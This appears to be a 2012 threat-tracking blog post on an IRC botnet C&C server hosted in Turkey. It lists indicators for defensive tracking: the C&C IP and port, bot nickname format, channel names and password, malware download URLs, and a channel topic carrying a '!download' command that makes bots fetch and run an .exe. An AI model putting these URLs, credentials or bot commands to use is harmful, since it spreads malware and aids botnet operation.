4.byinter.net(irc botnet hosted in Turkey Balikesir Turk Telekomunikasyon Anonim Sirketi)

By Pig, August 22, 2012

Resolved : [4.byinter.net] To [88.255.116.47]

Download URLs
http://72.32.8.40/iplocator.htm (www.geobytes.com)
http://108.167.179.252/xxx.exe (www.grupobysoft.com)
Outgoing connection to remote server: www.geobytes.com TCP port 80
C&C Server: 88.255.116.47:6667
Server Password:
Username: TURKiSH
Nickname: [N][DEU][XP][29218]
Channel: #s (Password: KCA)
#X, #XX, #XXX and #KCA
Channeltopic: :!download http://www.grupobysoft.com/xxx.exe 1

hosting infos:
http://whois.domaintools.com/88.255.116.47

Categories: Uncategorized

Previous postuokm8.biz(Insomnia Bot hosted in Netherlands Tilburg nfinite Technologies Limited)

Next postusagov.servequake.com (Ragebot and ngrbot hosted by United States State College Comcast Business Communications Llc)